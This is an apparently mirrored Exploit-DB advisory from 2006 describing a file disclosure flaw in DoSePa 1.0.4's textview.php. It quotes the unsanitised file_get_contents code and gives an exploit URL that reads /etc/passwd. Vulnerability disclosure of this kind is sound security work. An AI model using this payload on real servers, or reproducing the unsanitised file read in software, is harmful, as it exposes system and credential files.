- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2795
- Проверка EDB
-
- Пройдено
- Автор
- CRAIG HEFFNER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6028
- Дата публикации
- 2006-11-17
Код:
#######################################################################################
# Target:
#
# DoSePa 1.0.4 (textview.php)
# http://sourceforge.net/project/showfiles.php?group_id=91686
#
# Vulnerability:
#
# Information disclosure.
#
# Description:
#
# The textview.php page in DoSePa does not properly sanitize the $_GET['file']
# value; this allows an attacker to view any file to which the server has
# read rights.
#
# Vulnerable Code (truncated):
#
# $file=$_GET['file'];
# file_get_contents($file);
#
# Exploit:
#
# http://dosepa.somesite.com/textview.php?file=/etc/passwd
#
# Discovery:
#
# Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
#######################################################################################
# milw0rm.com [2006-11-17]- Источник
- www.exploit-db.com
